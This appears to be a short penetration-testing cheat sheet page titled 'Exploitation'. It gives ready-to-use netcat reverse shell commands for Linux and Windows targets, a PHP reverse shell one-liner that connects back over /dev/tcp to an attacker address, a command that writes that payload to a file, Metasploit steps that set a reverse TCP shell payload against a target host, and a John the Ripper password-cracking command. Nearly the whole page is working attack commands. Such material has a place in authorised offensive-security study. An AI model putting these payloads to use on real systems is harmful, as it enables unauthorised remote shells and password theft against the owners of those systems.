Skip to content

Exploitation

RevShell

You can use the following website to craft revshell as you wish

nc Revshell

nc listener on attacker machine
nc -nlvp 4444
nc on Linux target
nc $attacker_ip 4444 -e /bin/bash
nc on Windows machine
nc $attacker_ip 4444 -e cmd.exe

PHP Revshell

PHP one liner
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/"ATTACKING IP"/4444 0>&1'");?>
Automatically create PHP revshell using interface of your choice
interface="tun0"; echo "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/$(ip -o -4 addr show $interface | awk '{print $4}' | cut -d/ -f1)/4444 0>&1'\");?>" > /home/parallels/Documents/revshell.php

Metasploit

sudo msfdb ini

sudo systemctl enable postgresql 

sudo msfconsole Launch Metasploit 

workspace -a $workspace 

db_nmap -A $ip

search type:auxiliary ssh

workspace -a exploits

search Apache $version 

use $number

show options

set payload payload/linux/x64/shell_reverse_tcp

show options

set SSL False
set RPORT 80
set RHOSTS $target_ip

run

Password cracking

johntheripper
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt